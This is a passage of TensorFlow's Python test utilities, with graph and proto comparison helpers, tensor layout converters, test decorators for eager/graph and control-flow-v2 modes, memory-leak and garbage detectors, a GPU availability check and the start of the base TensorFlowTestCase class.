raise TypeError(
"Expected tf.GraphDef for expected, got %s" % type(expected).__name__)
if checkpoint_v2:
_strip_checkpoint_v2_randomized(actual)
_strip_checkpoint_v2_randomized(expected)
diff = pywrap_tensorflow.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
"""Compares MetaGraphDefs `a` and `b` in unit test class `tester`."""
# Carefully check the collection_defs
tester.assertEqual(set(a.collection_def), set(b.collection_def))
collection_keys = a.collection_def.keys()
for k in collection_keys:
a_value = a.collection_def[k]
b_value = b.collection_def[k]
proto_type = ops.get_collection_proto_type(k)
if proto_type:
a_proto = proto_type()
b_proto = proto_type()
# Number of entries in the collections is the same
tester.assertEqual(
len(a_value.bytes_list.value), len(b_value.bytes_list.value))
for (a_value_item, b_value_item) in zip(a_value.bytes_list.value,
b_value.bytes_list.value):
a_proto.ParseFromString(a_value_item)
b_proto.ParseFromString(b_value_item)
tester.assertProtoEquals(a_proto, b_proto)
else:
tester.assertEquals(a_value, b_value)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("collection_def")
b.ClearField("collection_def")
# Check the graph_defs.
assert_equal_graph_def(a.graph_def, b.graph_def, checkpoint_v2=True)
# Check graph_def versions (ignored by assert_equal_graph_def).
tester.assertProtoEquals(a.graph_def.versions, b.graph_def.versions)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("graph_def")
b.ClearField("graph_def")
tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(_SHARDED_SAVE_OP_PATTERN, str(attr_tensor_string_value))):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
return pywrap_tensorflow.IsGoogleCudaEnabled()
def CudaSupportsHalfMatMulAndConv():
return pywrap_tensorflow.CudaSupportsHalfMatMulAndConv()
def IsMklEnabled():
return pywrap_tensorflow.IsMklEnabled()
def InstallStackTraceHandler():
pywrap_tensorflow.InstallStacktraceHandler()
def NHWCToNCHW(input_tensor):
"""Converts the input from the NHWC format to NCHW.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 3, 1, 2], 5: [0, 4, 1, 2, 3]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
"""Transforms the input from the NHWC layout to NCHW_VECT_C layout.
Note: Does not include quantization or type conversion steps, which should
be applied afterwards.
Args:
input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NCHW_VECT_C
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not evenly
divisible by 4.
"""
permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
temp_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if temp_shape[-1] % 4 != 0:
raise ValueError(
"Last dimension of input must be evenly divisible by 4 to convert to "
"NCHW_VECT_C.")
temp_shape[-1] //= 4
temp_shape.append(4)
permutation = permutations[len(temp_shape)]
if is_tensor:
t = array_ops.reshape(input_shape_or_tensor, temp_shape)
return array_ops.transpose(t, permutation)
else:
return [temp_shape[a] for a in permutation]
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
"""Transforms the input from the NCHW_VECT_C layout to NHWC layout.
Note: Does not include de-quantization or type conversion steps, which should
be applied beforehand.
Args:
input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NHWC
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not 4.
"""
permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
input_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if input_shape[-1] != 4:
raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
permutation = permutations[len(input_shape)]
nhwc_shape = [input_shape[a] for a in permutation[:-1]]
nhwc_shape[-1] *= input_shape[-1]
if is_tensor:
t = array_ops.transpose(input_shape_or_tensor, permutation)
return array_ops.reshape(t, nhwc_shape)
else:
return nhwc_shape
def NCHWToNHWC(input_tensor):
"""Converts the input from the NCHW format to NHWC.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 2, 3, 1], 5: [0, 2, 3, 4, 1]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def skip_if(condition):
"""Skips the decorated function if condition is or evaluates to True.
Args:
condition: Either an expression that can be used in "if not condition"
statement, or a callable whose result should be a boolean.
Returns:
The wrapped function
"""
def real_skip_if(fn):
def wrapper(*args, **kwargs):
if callable(condition):
skip = condition()
else:
skip = condition
if not skip:
fn(*args, **kwargs)
return wrapper
return real_skip_if
def enable_c_shapes(fn):
"""No-op. TODO(b/74620627): Remove this."""
return fn
def with_c_shapes(cls):
"""No-op. TODO(b/74620627): Remove this."""
return cls
def enable_control_flow_v2(fn):
"""Decorator for enabling CondV2 and WhileV2 on a test.
Note this enables using CondV2 and WhileV2 after running the test class's
setup/teardown methods.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
enable_cond_v2_old = control_flow_ops.ENABLE_COND_V2
enable_while_v2_old = control_flow_ops.ENABLE_WHILE_V2
control_flow_ops.ENABLE_COND_V2 = True
control_flow_ops.ENABLE_WHILE_V2 = True
try:
fn(*args, **kwargs)
finally:
control_flow_ops.ENABLE_COND_V2 = enable_cond_v2_old
control_flow_ops.ENABLE_WHILE_V2 = enable_while_v2_old
return wrapper
def with_control_flow_v2(cls):
"""Adds methods that call original methods with WhileV2 and CondV2 enabled.
Note this enables CondV2 and WhileV2 in new methods after running the test
class's setup method.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
If a test function has _disable_control_flow_v2 attr set to True (using the
@disable_control_flow_v2 decorator), the v2 function is not generated for it.
Example:
@test_util.with_control_flow_v2
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
@test_util.disable_control_flow_v2("b/xyzabc")
def testDisabledForV2(self):
...
Generated class:
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
def testEnabledForV2WithControlFlowV2(self):
// Enable V2 flags.
testEnabledForV2(self)
// Restore V2 flags.
def testDisabledForV2(self):
...
Args:
cls: class to decorate
Returns:
cls with new test methods added
"""
if control_flow_ops.ENABLE_WHILE_V2 and control_flow_ops.ENABLE_COND_V2:
return cls
for name, value in cls.__dict__.copy().items():
if (callable(value) and name.startswith("test") and
not getattr(value, "_disable_control_flow_v2", False)):
setattr(cls, name + "WithControlFlowV2", enable_control_flow_v2(value))
return cls
def disable_control_flow_v2(unused_msg):
"""Decorator for a function in a with_control_flow_v2 enabled test class.
Blocks the function from being run with v2 control flow ops.
Args:
unused_msg: Reason for disabling.
Returns:
The wrapped function with _disable_control_flow_v2 attr set to True.
"""
def wrapper(func):
func._disable_control_flow_v2 = True
return func
return wrapper
def assert_no_new_pyobjects_executing_eagerly(f):
"""Decorator for asserting that no new Python objects persist after a test.
Runs the test multiple times executing eagerly, first as a warmup and then to
let objects accumulate. The warmup helps ignore caches which do not grow as
the test is run repeatedly.
Useful for checking that there are no missing Py_DECREFs in the C exercised by
a bit of Python.
"""
def decorator(self, **kwargs):
"""Warms up, gets an object count, runs the test, checks for new objects."""
with context.eager_mode():
gc.disable()
# Run the test 2 times as warmup, in an attempt to fill up caches, which
# should not grow as the test is run repeatedly below.
#
# TODO(b/117156879): Running warmup twice is black magic; we have seen
# tests that fail with 1 warmup run, and pass with 2, on various versions
# of python2.7.x.
for _ in range(2):
f(self, **kwargs)
gc.collect()
previous_count = len(gc.get_objects())
if ops.has_default_graph():
collection_sizes_before = {
collection: len(ops.get_collection(collection))
for collection in ops.get_default_graph().collections
}
for _ in range(3):
f(self, **kwargs)
# Note that gc.get_objects misses anything that isn't subject to garbage
# collection (C types). Collections are a common source of leaks, so we
# test for collection sizes explicitly.
if ops.has_default_graph():
for collection_key in ops.get_default_graph().collections:
collection = ops.get_collection(collection_key)
size_before = collection_sizes_before.get(collection_key, 0)
if len(collection) > size_before:
raise AssertionError(
("Collection %s increased in size from "
"%d to %d (current items %s).") %
(collection_key, size_before, len(collection), collection))
# Make sure our collection checks don't show up as leaked memory by
# removing references to temporary variables.
del collection
del collection_key
del size_before
del collection_sizes_before
gc.collect()
# There should be no new Python objects hanging around.
new_count = len(gc.get_objects())
# In some cases (specifacally on MacOS), new_count is somehow
# smaller than previous_count.
# Using plain assert because not all classes using this decorator
# have assertLessEqual
assert new_count <= previous_count, (
"new_count(%d) is not less than or equal to previous_count(%d)" %
(new_count, previous_count))
gc.enable()
return decorator
def assert_no_new_tensors(f):
"""Decorator for asserting that no new Tensors persist after a test.
Mainly useful for checking that code using the Python C API has correctly
manipulated reference counts.
Clears the caches that it knows about, runs the garbage collector, then checks
that there are no Tensor or Tensor-like objects still around. This includes
Tensors to which something still has a reference (e.g. from missing
Py_DECREFs) and uncollectable cycles (i.e. Python reference cycles where one
of the objects has __del__ defined).
Args:
f: The test case to run.
Returns:
The decorated test case.
"""
def decorator(self, **kwargs):
"""Finds existing Tensors, runs the test, checks for new Tensors."""
def _is_tensorflow_object(obj):
try:
return isinstance(obj,
(ops.Tensor, variables.Variable,
tensor_shape.Dimension, tensor_shape.TensorShape))
except ReferenceError:
# If the object no longer exists, we don't care about it.
return False
tensors_before = set(
id(obj) for obj in gc.get_objects() if _is_tensorflow_object(obj))
outside_executed_eagerly = context.executing_eagerly()
# Run the test in a new graph so that collections get cleared when it's
# done, but inherit the graph key so optimizers behave.
outside_graph_key = ops.get_default_graph()._graph_key
with ops.Graph().as_default():
ops.get_default_graph()._graph_key = outside_graph_key
if outside_executed_eagerly:
with context.eager_mode():
f(self, **kwargs)
else:
f(self, **kwargs)
# Make an effort to clear caches, which would otherwise look like leaked
# Tensors.
context.context()._clear_caches() # pylint: disable=protected-access
gc.collect()
tensors_after = [
obj for obj in gc.get_objects()
if _is_tensorflow_object(obj) and id(obj) not in tensors_before
]
if tensors_after:
raise AssertionError(("%d Tensors not deallocated after test: %s" % (
len(tensors_after),
str(tensors_after),
)))
return decorator
def _find_reference_cycle(objects, idx):
def get_ignore_reason(obj, blacklist):
"""Tests whether an object should be omitted from the dependency graph."""
if len(blacklist) > 100:
return "<depth limit>"
if tf_inspect.isframe(obj):
if "test_util.py" in tf_inspect.getframeinfo(obj)[0]:
return "<test code>"
for b in blacklist:
if b is obj:
return "<test code>"
if obj is blacklist:
return "<test code>"
return None
# Note: this function is meant to help with diagnostics. Its output is purely
# a human readable representation, so you may freely modify it to suit your
# needs.
def describe(obj, blacklist, leaves_only=False):
"""Returns a custom human-readable summary of obj.
Args:
obj: the value to describe.
blacklist: same as blacklist in get_ignore_reason.
leaves_only: boolean flag used when calling describe recursively. Useful
for summarizing collections.
"""
if get_ignore_reason(obj, blacklist):
return "{}{}".format(get_ignore_reason(obj, blacklist), type(obj))
if tf_inspect.isframe(obj):
return "frame: {}".format(tf_inspect.getframeinfo(obj))
elif tf_inspect.ismodule(obj):
return "module: {}".format(obj.__name__)
else:
if leaves_only:
return "{}, {}".format(type(obj), id(obj))
elif isinstance(obj, list):
return "list({}): {}".format(
id(obj), [describe(e, blacklist, leaves_only=True) for e in obj])
elif isinstance(obj, tuple):
return "tuple({}): {}".format(
id(obj), [describe(e, blacklist, leaves_only=True) for e in obj])
elif isinstance(obj, dict):
return "dict({}): {} keys".format(id(obj), len(obj.keys()))
elif tf_inspect.isfunction(obj):
return "function({}) {}; globals ID: {}".format(
id(obj), obj.__name__, id(obj.__globals__))
else:
return "{}, {}".format(type(obj), id(obj))
def build_ref_graph(obj, graph, reprs, blacklist):
"""Builds a reference graph as <referrer> -> <list of refferents>.
Args:
obj: The object to start from. The graph will be built by recursively
adding its referrers.
graph: Dict holding the graph to be built. To avoid creating extra
references, the graph holds object IDs rather than actual objects.
reprs: Auxiliary structure that maps object IDs to their human-readable
description.
blacklist: List of objects to ignore.
"""
referrers = gc.get_referrers(obj)
blacklist = blacklist + (referrers,)
obj_id = id(obj)
for r in referrers:
if get_ignore_reason(r, blacklist) is None:
r_id = id(r)
if r_id not in graph:
graph[r_id] = []
if obj_id not in graph[r_id]:
graph[r_id].append(obj_id)
build_ref_graph(r, graph, reprs, blacklist)
reprs[r_id] = describe(r, blacklist)
def find_cycle(el, graph, reprs, path):
"""Finds and prints a single cycle in the dependency graph."""
if el not in graph:
return
for r in graph[el]:
if r in path:
logging.error("Reference cycle sample:")
for p in path + (r,):
logging.error(reprs.get(p, "unknown object " + str(p)))
return True
else:
if find_cycle(r, graph, reprs, path + (r,)):
return True
return False
obj = objects[idx]
graph = {} # referrer ID -> object ID
reprs = {} # object ID -> description
build_ref_graph(obj, graph, reprs, (objects, graph, reprs, get_ignore_reason,
describe, build_ref_graph, find_cycle))
for k in graph:
if find_cycle(k, graph, reprs, ()):
return True
return False
def assert_no_garbage_created(f):
"""Test method decorator to assert that no garbage has been created.
Note that this decorator sets DEBUG_SAVEALL, which in some Python interpreters
cannot be un-set (i.e. will disable garbage collection for any other unit
tests in the same file/shard).
Args:
f: The function to decorate.
Returns:
The decorated function.
"""
def decorator(self, **kwargs):
"""Sets DEBUG_SAVEALL, runs the test, and checks for new garbage."""
# Force-load `distribution_strategy_context` to prevent GC at
# test time when using eager. Remove once b/117329403 is resolved.
tape.distribution_strategy_context.get_distribution_strategy()
gc.disable()
previous_debug_flags = gc.get_debug()
gc.set_debug(gc.DEBUG_SAVEALL)
gc.collect()
previous_garbage = len(gc.garbage)
f(self, **kwargs)
gc.collect()
new_garbage = len(gc.garbage)
if new_garbage > previous_garbage:
logging.error(
"The decorated test created work for Python's garbage collector, "
"likely due to a reference cycle. New objects in cycle(s):")
for i, obj in enumerate(gc.garbage[previous_garbage:]):
try:
logging.error("Object %d of %d", i,
len(gc.garbage) - previous_garbage)
def _safe_object_str(obj):
return "<%s %d>" % (obj.__class__.__name__, id(obj))
logging.error(" Object type: %s", _safe_object_str(obj))
logging.error(
" Referrer types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referrers(obj)]))
logging.error(
" Referent types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referents(obj)]))
logging.error(" Object attribute names: %s", dir(obj))
logging.error(" Object __str__:")
logging.error(obj)
logging.error(" Object __repr__:")
logging.error(repr(obj))
except Exception: # pylint: disable=broad-except
logging.error("(Exception while printing object)")
# When garbage is created, this call can help identify reference cycles,
# which are typically the cause of such garbage.
if new_garbage > previous_garbage:
for i in range(previous_garbage, new_garbage):
if _find_reference_cycle(gc.garbage, i):
break
# This will fail if any garbage has been created, typically because of a
# reference cycle.
self.assertEqual(previous_garbage, new_garbage)
# TODO(allenl): Figure out why this debug flag reset doesn't work. It would
# be nice to be able to decorate arbitrary tests in a large test suite and
# not hold on to every object in other tests.
gc.set_debug(previous_debug_flags)
gc.enable()
return decorator
def _combine_named_parameters(**kwargs):
"""Generate combinations based on its keyword arguments.
Two sets of returned combinations can be concatenated using +. Their product
can be computed using `times()`.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]`
or `option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
if not kwargs:
return [OrderedDict()]
sort_by_key = lambda k: k[0][0]
kwargs = OrderedDict(sorted(kwargs.items(), key=sort_by_key))
first = list(kwargs.items())[0]
rest = dict(list(kwargs.items())[1:])
rest_combined = _combine_named_parameters(**rest)
key = first[0]
values = first[1]
if not isinstance(values, list):
values = [values]
combinations = [
OrderedDict(sorted(list(combined.items()) + [(key, v)], key=sort_by_key))
for v in values
for combined in rest_combined
]
return combinations
def generate_combinations_with_testcase_name(**kwargs):
"""Generate combinations based on its keyword arguments using combine().
This function calls combine() and appends a testcase name to the list of
dictionaries returned. The 'testcase_name' key is a required for named
parameterized tests.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]`
or `option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
combinations = _combine_named_parameters(**kwargs)
named_combinations = []
for combination in combinations:
assert isinstance(combination, OrderedDict)
name = "".join([
"_{}_{}".format("".join(filter(str.isalnum, key)), "".join(
filter(str.isalnum, str(value))))
for key, value in combination.items()
])
named_combinations.append(
OrderedDict(
list(combination.items()) + [("testcase_name",
"_test{}".format(name))]))
return named_combinations
def run_all_in_graph_and_eager_modes(cls):
"""Execute all test methods in the given class with and without eager."""
base_decorator = run_in_graph_and_eager_modes
for name, value in cls.__dict__.copy().items():
if callable(value) and name.startswith(
"test") and not name.startswith("testSkipEager"):
setattr(cls, name, base_decorator(value))
return cls
def run_in_graph_and_eager_modes(func=None,
config=None,
use_gpu=True,
reset_test=True,
assert_no_eager_garbage=False):
"""Execute the decorated test with and without enabling eager execution.
This function returns a decorator intended to be applied to test methods in
a `tf.test.TestCase` class. Doing so will cause the contents of the test
method to be executed twice - once normally, and once with eager execution
enabled. This allows unittests to confirm the equivalence between eager
and graph execution (see `tf.enable_eager_execution`).
For example, consider the following unittest:
```python
class MyTests(tf.test.TestCase):
@run_in_graph_and_eager_modes
def test_foo(self):
x = tf.constant([1, 2])
y = tf.constant([3, 4])
z = tf.add(x, y)
self.assertAllEqual([4, 6], self.evaluate(z))
if __name__ == "__main__":
tf.test.main()
```
This test validates that `tf.add()` has the same behavior when computed with
eager execution enabled as it does when constructing a TensorFlow graph and
executing the `z` tensor in a session.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
config: An optional config_pb2.ConfigProto to use to configure the
session when executing graphs.
use_gpu: If True, attempt to run as many operations as possible on GPU.
reset_test: If True, tearDown and SetUp the test case between the two
executions of the test (once with and once without eager execution).
assert_no_eager_garbage: If True, sets DEBUG_SAVEALL on the garbage
collector and asserts that no extra garbage has been created when running
the test with eager execution enabled. This will fail if there are
reference cycles (e.g. a = []; a.append(a)). Off by default because some
tests may create garbage for legitimate reasons (e.g. they define a class
which inherits from `object`), and because DEBUG_SAVEALL is sticky in some
Python interpreters (meaning that tests which rely on objects being
collected elsewhere in the unit test file will not work). Additionally,
checks that nothing still has a reference to Tensors that the test
allocated.
Returns:
Returns a decorator that will run the decorated test method twice:
once by constructing and executing a graph in a session and once with
eager execution enabled.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError(
"`run_test_in_graph_and_eager_modes` only supports test methods. "
"Did you mean to use `run_all_in_graph_and_eager_modes`?")
def decorated(self, *args, **kwargs):
try:
with context.graph_mode():
with self.test_session(use_gpu=use_gpu, config=config):
f(self, *args, **kwargs)
except unittest.case.SkipTest:
pass
def run_eagerly(self, **kwargs):
if not use_gpu:
with ops.device("/device:CPU:0"):
f(self, *args, **kwargs)
else:
f(self, *args, **kwargs)
if assert_no_eager_garbage:
ops.reset_default_graph()
run_eagerly = assert_no_new_tensors(
assert_no_garbage_created(run_eagerly))
if reset_test:
# This decorator runs the wrapped test twice.
# Reset the test environment between runs.
self.tearDown()
self._tempdir = None
# Create a new graph for the eagerly executed version of this test for
# better isolation.
graph_for_eager_test = ops.Graph()
with graph_for_eager_test.as_default(), context.eager_mode():
if reset_test:
self.setUp()
run_eagerly(self, **kwargs)
ops.dismantle_graph(graph_for_eager_test)
return decorated
if func is not None:
return decorator(func)
return decorator
@tf_export("test.is_gpu_available")
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
"""Returns whether TensorFlow can access a GPU.
Args:
cuda_only: limit the search to CUDA gpus.
min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
CUDA compute capability required, or None if no requirement.
Returns:
True iff a gpu device of the requested kind is available.
"""
def compute_capability_from_device_desc(device_desc):
# TODO(jingyue): The device description generator has to be in sync with
# this file. Another option is to put compute capability in
# DeviceAttributes, but I avoided that to keep DeviceAttributes
# target-independent. Reconsider this option when we have more things like
# this to keep in sync.
# LINT.IfChange
match = re.search(r"compute capability: (\d+)\.(\d+)", device_desc)
# LINT.ThenChange(//tensorflow/core/\
# common_runtime/gpu/gpu_device.cc)
if not match:
return 0, 0
return int(match.group(1)), int(match.group(2))
try:
for local_device in device_lib.list_local_devices():
if local_device.device_type == "GPU":
if (min_cuda_compute_capability is None or
compute_capability_from_device_desc(
local_device.physical_device_desc) >=
min_cuda_compute_capability):
return True
if local_device.device_type == "SYCL" and not cuda_only:
return True
return False
except errors_impl.NotFoundError as e:
if not all([x in str(e) for x in ["CUDA", "not find"]]):
raise e
else:
logging.error(str(e))
return False
@contextlib.contextmanager
def device(use_gpu):
"""Uses gpu when requested and available."""
if use_gpu and is_gpu_available():
dev = "/device:GPU:0"
else:
dev = "/device:CPU:0"
with ops.device(dev):
yield
class CapturedWrites(object):
"""A utility class to load the captured writes made to a stream."""
def __init__(self, capture_location):
self.capture_location = capture_location
def contents(self):
"""Get the captured writes as a single string."""
with open(self.capture_location) as tmp_file:
output_data = "".join(tmp_file.readlines())
return output_data
class ErrorLoggingSession(session.Session):
"""Wrapper around a Session that logs errors in run().
"""
def run(self, *args, **kwargs):
try:
return super(ErrorLoggingSession, self).run(*args, **kwargs)
except Exception as e: # pylint: disable=broad-except
# Note: disable the logging for OutOfRangeError, which makes the output
# of tf.data tests hard to read, because OutOfRangeError is used as the
# signal completion
if not isinstance(e, errors.OutOfRangeError):
logging.error(str(e))
raise
@tf_export("test.TestCase")
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow.
"""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
self._threads = []
self._tempdir = None
self._cached_session = None
def setUp(self):
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
# Note: The following line is necessary because some test methods may error
# out from within nested graph contexts (e.g., via assertRaises and
# assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
# under certain versions of Python. That would cause
# ops.reset_default_graph() to throw an exception if the stack were not
# cleared first.
ops._default_graph_stack.reset() # pylint: disable=protected-access
ops.reset_default_graph()
random_seed.set_random_seed(random_seed.DEFAULT_GRAPH_SEED)
def tearDown(self):
for thread in self._threads:
thread.check_termination()
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
If you call this method multiple times during in a test, it will return the
same folder. However, across different runs the directories will be
different. This will ensure that across different runs tests will not be
able to pollute each others environment.
If you need multiple unique directories within a single test, you should
use tempfile.mkdtemp as follows:
tempfile.mkdtemp(dir=self.get_temp_dir()):
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
@contextlib.contextmanager
def captureWritesToStream(self, stream):
"""A context manager that captures the writes to a given stream.
This context manager captures all writes to a given stream inside of a
`CapturedWrites` object. When this context manager is created, it yields
the `CapturedWrites` object. The captured contents can be accessed by
calling `.contents()` on the `CapturedWrites`.
For this function to work, the stream must have a file descriptor that
can be modified using `os.dup` and `os.dup2`, and the stream must support
a `.flush()` method. The default python sys.stdout and sys.stderr are
examples of this. Note that this does not work in Colab or Jupyter
notebooks, because those use alternate stdout streams.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
input = [1.0, 2.0, 3.0, 4.0, 5.0]
with self.captureWritesToStream(sys.stdout) as captured:
result = MyOperator(input).eval()
self.assertStartsWith(captured.contents(), "This was printed.")
```
Args:
stream: The stream whose writes should be captured. This
stream must have a file descriptor, support writing via using that
file descriptor, and must have a `.flush()` method.
Yields:
A `CapturedWrites` object that contains all writes to the specified stream
made during this context.
"""
stream.flush()
fd = stream.fileno()
tmp_file_path = tempfile.mktemp(dir=self.get_temp_dir())
tmp_file = open(tmp_file_path, "w")
orig_fd = os.dup(fd)
os.dup2(tmp_file.fileno(), fd)
try:
yield CapturedWrites(tmp_file_path)
finally:
tmp_file.close()
os.dup2(orig_fd, fd)
def _AssertProtoEquals(self, a, b, msg=None):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results
for floating point attributes, and then use assertProtoEqual()
in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
msg: Optional message to report on failure.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True, msg=msg)
def assertProtoEquals(self, expected_message_maybe_ascii, message, msg=None):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(
expected_message_maybe_ascii,
expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message, msg=msg)
else:
assert False, ("Can't compare protos of type %s and %s. %s" %
(type(expected_message_maybe_ascii), type(message), msg))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER,
msg=None):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual, msg=msg)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
def _eval_tensor(self, tensor):
if tensor is None:
return None
elif callable(tensor):
return self._eval_helper(tensor())
else:
try:
if sparse_tensor.is_sparse(tensor):
return sparse_tensor.SparseTensorValue(tensor.indices, tensor.values,
tensor.dense_shape)
return tensor.numpy()
except AttributeError as e:
six.raise_from(ValueError("Unsupported type %s." % type(tensor)), e)
def _eval_helper(self, tensors):
if tensors is None:
return None
return nest.map_structure(self._eval_tensor, tensors)
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
tensors numpy values.
"""
if context.executing_eagerly():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
if sess is None:
with self.test_session() as sess:
return sess.run(tensors)
else:
return sess.run(tensors)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def session(self, graph=None, config=None, use_gpu=False, force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
Note that this will set this session and the graph as global defaults.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield None
else:
with self._create_session(graph, config, force_gpu) as sess:
with self._constrain_devices_and_set_default(sess, use_gpu, force_gpu):
yield sess
@contextlib.contextmanager
def cached_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method behaves differently than self.session(): for performance reasons
`cached_session` will by default reuse the same session within the same
test. The session returned by this function will only be closed at the end
of the test (in the TearDown function).
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
```python
